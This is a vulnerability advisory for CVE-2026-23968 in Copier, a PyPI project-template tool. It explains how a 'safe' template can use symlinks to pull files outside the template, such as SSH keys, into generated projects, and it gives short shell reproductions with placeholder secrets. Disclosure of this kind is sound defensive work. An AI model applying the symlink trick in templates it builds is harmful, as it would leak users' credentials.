CVE-2026-23968
MEDIUM5.5EPSS 0.05%Copier safe template has arbitrary filesystem read access via symlinks when _preserve_symlinks: false
Description
### Impact Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use [unsafe](https://copier.readthedocs.io/en/stable/configuring/#unsafe) features like custom Jinja extensions which would require passing the `--UNSAFE,--trust` flag. As it turns out, a safe template can currently include arbitrary files/directories outside the local template clone location by using symlinks along with [`_preserve_symlinks: false`](https://copier.readthedocs.io/en/stable/configuring/#preserve_symlinks) (which is Copier's default setting). Imagine, e.g., a malicious template author who creates a template that reads SSH keys or other secrets from well-known locations and hopes for a user to push the generated project to a public location like [github.com](https://github.com/) where the template author can extract the secrets. Reproducible example: - Illegally include a file in the generated project via symlink resolution: ```shell echo "s3cr3t" > secret.txt mkdir src/ pushd src/ ln -s ../secret.txt stolen-secret.txt popd uvx copier copy src/ dst/ cat dst/stolen-secret.txt #s3cr3t ``` - Illegally include a directory in the generated project via symlink resolution: ```shell mkdir secrets/ pushd secrets/ echo "s3cr3t" > secret.txt popd mkdir src/ pushd src/ ln -s ../secrets stolen-secrets popd uvx copier copy src/ dst/ tree dst/ # dst/ # └── stolen-secrets # └── secret.txt # # 1 directory, 1 file cat dst/stolen-secrets/secret.txt # s3cr3t ``` ### Patches n/a ### Workarounds n/a ### References n/a
Affected packages (1)
- PyPI/copierfrom 0, < 9.11.2
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N |
| osv | CVSS 3.1 | MEDIUM5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |